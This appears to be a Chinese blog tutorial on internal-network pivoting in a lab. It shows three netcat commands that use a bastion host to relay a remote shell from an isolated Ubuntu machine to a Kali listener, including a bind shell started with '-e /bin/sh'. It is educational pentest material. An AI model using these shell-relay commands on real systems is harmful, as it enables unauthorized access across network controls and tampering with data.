编程开源技术交流,分享技术与知识

网站首页 > 开源技术 正文

netcat内网代理实践

wxchong 2024-06-13 22:31:48 开源技术 10 ℃ 0 评论

问渠哪得清如许,为有源头活水来。今天花了大半天时间把ATT&CK12大战略100大战术草草的过了一遍,发现落地还是很困难,一眼看不到希望。下午换了一个局点,发现专家系统的适应性很差,参数还要重新调,很难过。现在最关心的是:

  • 如何从海量主机中挑选最可能中毒的主机?

我的解决方案是通过做主机的威胁量化排名,遇到的问题是调参麻烦

  • 如何证明安全事件靠谱?

我的解决方案是通过做主机的行为基线,这周要做出demo


带你了解「安全评估与渗透测试」

作者 ailx10



在企业里网络管控是很严格的,有很多堡垒机隔离了内网的不同主机,今天的主题是「内网代理」,我们的kali小黑兄弟,想要去ubuntu16拿点数据,但是发现路由不通。幸运的是,小黑可以访问ubuntu18,而ubuntu18又可以访问ubuntu16,这里的ubuntu18就相当于堡垒机,那么聪明你能帮助小黑建立到底ubuntu16的shell控制通道吗?

基本环境如下:

  • kali rolling:192.168.160.140
  • ubuntu18:192.168.160.137
  • ubuntu16:192.168.160.136

组网环境如下:

  • 实线表示网络联通
  • 虚线表示网络断开

第一步:在kali rolling上操作

  • 这里监听自己的23333端口就好了
  • 完成第三步,就会自动获得ubuntu16的shell
  • 这里可以看到,ubuntu16上有「小黑的缺点.txt」隐私文档
nc -lvp 23333

第二步:在ubuntu16上操作

  • 这里就是将ubuntu16的shell通过23333端口弹出去
  • 不管谁访问ubuntu16的23333端口,都将获得shell
nc -lvp 23333 -e /bin/sh

第三步:在ubuntu18上操作

  • 这里首先获得ubuntu16的shell
  • 然后将shell重定向到kali rolling上去
  • 这个时候,小黑在kali rolling上就拿到了ubuntu16的shell啦
  • 于是,小黑轻松的删除了「小黑的缺点.txt」
nc -v 192.168.160.136 23333 -c "nc -v 192.168.160.140 23333"

本篇完~

Tags:

本文暂时没有评论,来添加一个吧(●'◡'●)

欢迎 发表评论:

最近发表
标签列表